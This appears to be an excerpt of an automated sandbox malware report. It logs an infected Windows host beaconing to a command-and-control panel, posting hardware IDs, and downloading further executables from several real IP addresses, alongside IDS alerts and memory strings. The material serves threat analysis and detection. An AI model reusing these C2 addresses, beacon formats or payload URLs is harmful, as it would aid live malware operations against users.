Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 03:06:26 GMTContent-Type: application/octet-streamContent-Length: 1840128Last-Modified: Sat, 30 Nov 2024 03:04:55 GMTConnection: keep-aliveETag: "674a80d7-1c1400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce b4 e2 38 8a d5 8c 6b 8a d5 8c 6b 8a d5 8c 6b e5 a3 27 6b 92 d5 8c 6b e5 a3 12 6b 87 d5 8c 6b e5 a3 26 6b b0 d5 8c 6b 83 ad 0f 6b 89 d5 8c 6b 83 ad 1f 6b 88 d5 8c 6b 0a ac 8d 6a 89 d5 8c 6b 8a d5 8d 6b d6 d5 8c 6b e5 a3 23 6b 98 d5 8c 6b e5 a3 11 6b 8b d5 8c 6b 52 69 63 68 8a d5 8c 6b 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 e8 97 48 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 98 02 00 00 22 01 00 00 00 00 00 00 a0 6a 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 d0 6a 00 00 04 00 00 83 e5 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 62 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 f0 01 00 00 00 a0 24 00 00 02 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 
61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 50 2b 00 00 c0 24 00 00 02 00 00 00 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 73 71 77 6e 6b 75 61 79 00 80 1a 00 00 10 50 00 00 74 1a 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 64 6c 72 73 63 6d 6b 70 00 10 00 00 00 90 6a 00 00 06 00 00 00 ec 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 a0 6a 00 00 22 00 00 00 f2 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 03:06:34 GMTContent-Type: application/octet-streamContent-Length: 922112Last-Modified: Sat, 30 Nov 2024 03:03:02 GMTConnection: keep-aliveETag: "674a8066-e1200"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 03:06:42 GMTContent-Type: application/octet-streamContent-Length: 2765824Last-Modified: Sat, 30 Nov 2024 03:03:28 GMTConnection: keep-aliveETag: "674a8080-2a3400"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 03:06:52 GMTContent-Type: application/octet-streamContent-Length: 4467200Last-Modified: Sat, 30 Nov 2024 01:19:55 GMTConnection: keep-aliveETag: "674a683b-442a00"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 03:06:52 GMTContent-Type: application/octet-streamContent-Length: 2765824Last-Modified: Sat, 30 Nov 2024 03:03:30 GMTConnection: keep-aliveETag: "674a8082-2a3400"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 03:07:05 GMTContent-Type: application/octet-streamContent-Length: 2038784Last-Modified: Sat, 30 Nov 2024 01:37:00 GMTConnection: keep-aliveETag: "674a6c3c-1f1c00"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 31 32 39 37 35 42 34 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB12975B45F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: GET /files/6802601040/SxQyhJr.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 30 34 38 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1010480001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 30 34 38 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1010481001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 30 34 38 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1010482001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGCGDBGCAAEBFIECGHDGHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 34 37 31 37 35 42 36 37 42 38 31 31 30 37 33 34 30 34 30 39 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 72 75 6d 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 47 2d 2d 0d 0a Data Ascii: ------DGCGDBGCAAEBFIECGHDGContent-Disposition: form-data; name="hwid"C47175B67B81107340409------DGCGDBGCAAEBFIECGHDGContent-Disposition: form-data; name="build"drum------DGCGDBGCAAEBFIECGHDG--
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 30 34 38 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1010483001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 30 34 38 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1010484001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /files/unique1/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 30 34 38 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1010485001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 31.41.244.11
Source: Joe Sandbox View IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View IP Address: 34.149.100.209 34.149.100.209
Source: Joe Sandbox View IP Address: 185.215.113.16 185.215.113.16
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: fb0aa01abe9d8e4037eb3473ca6e2dca
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49765 -> 31.41.244.11:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49782 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49797 -> 104.21.16.9:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49803 -> 104.21.16.9:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49810 -> 104.21.16.9:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49815 -> 104.21.16.9:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49823 -> 104.21.16.9:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49822 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49828 -> 104.21.16.9:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49836 -> 104.21.16.9:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49800 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49840 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49877 -> 104.21.16.9:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49892 -> 31.41.244.11:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49894 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49924 -> 31.41.244.11:80
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_006EBE30 Sleep,InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile, 6_2_006EBE30
Source: global traffic HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global traffic HTTP traffic detected: GET /files/6802601040/SxQyhJr.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/unique1/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/UpdateService.canUsuallyCheckForUpdates - unable to automatically check for updates, the option has been disabled by the administrator.jar:file:///C:/Program%20Files/Mozilla%20Firefox/browser/features/pictureinpicture@mozilla.org.xpi!/experiment-apis/aboutConfigPipPrefs.js equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/UpdateService.canUsuallyCheckForUpdates - unable to automatically check for updates, the option has been disabled by the administrator.jar:file:///C:/Program%20Files/Mozilla%20Firefox/browser/features/pictureinpicture@mozilla.org.xpi!/experiment-apis/aboutConfigPipPrefs.js equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN 'www.' || :strippedURL AND 'www.' || :strippedURL || X'FFFF'moz-extension://a581a2f1-688c-434b-8db8-16166b1993d9/lib/intervention_helpers.jsIt looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionYou may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJEhttps://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSyC7jsptDS3am4tPx4r3nxis7IMjBc5Dovo&$httpMethod=POST[{incognito:null, tabId:null, types:null, urls:["https://watch.sling.com/*", "https://www.sling.com/*"], windowId:null}, ["blocking", "requestHeaders"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN 'www.' || :strippedURL AND 'www.' || :strippedURL || X'FFFF'moz-extension://a581a2f1-688c-434b-8db8-16166b1993d9/lib/intervention_helpers.jsIt looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionYou may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJEhttps://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSyC7jsptDS3am4tPx4r3nxis7IMjBc5Dovo&$httpMethod=POST[{incognito:null, tabId:null, types:null, urls:["https://watch.sling.com/*", "https://www.sling.com/*"], windowId:null}, ["blocking", "requestHeaders"]] equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN 'www.' || :strippedURL AND 'www.' || :strippedURL || X'FFFF'moz-extension://a581a2f1-688c-434b-8db8-16166b1993d9/lib/intervention_helpers.jsIt looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionYou may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJEhttps://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSyC7jsptDS3am4tPx4r3nxis7IMjBc5Dovo&$httpMethod=POST[{incognito:null, tabId:null, types:null, urls:["https://watch.sling.com/*", "https://www.sling.com/*"], windowId:null}, ["blocking", "requestHeaders"]] equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000003.2792631818.000001DEFA713000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3049413497.000001DEEC2C6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2933112137.000001DEF03AB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://www.facebook.com/* equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: --autocomplete-popup-separator-color--panel-banner-item-update-supported-bgcolor*://*.adsafeprotected.com/*/unit/**://www.facebook.com/platform/impression.php*executeIDB/promise</transaction.onerror equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3025366411.000001DEEB903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: -l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Wikipedia&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.reddit.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="R"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/reddit-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Reddit<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Reddit&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" href="https://twitter.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="T"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/twitter-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Twitter<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Twitter&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li></ul><div class="edit-topsites-wrapper"></div></div></section></div></div></div></div><style data-styles="[[null]]"></style></div><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div></div></div></div><style data-styles="[[null]]"></style></div></div></main></div></div> equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001C.00000003.2880681828.000001DEFA65E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8*://www.facebook.com/* equals www.facebook.com (Facebook)
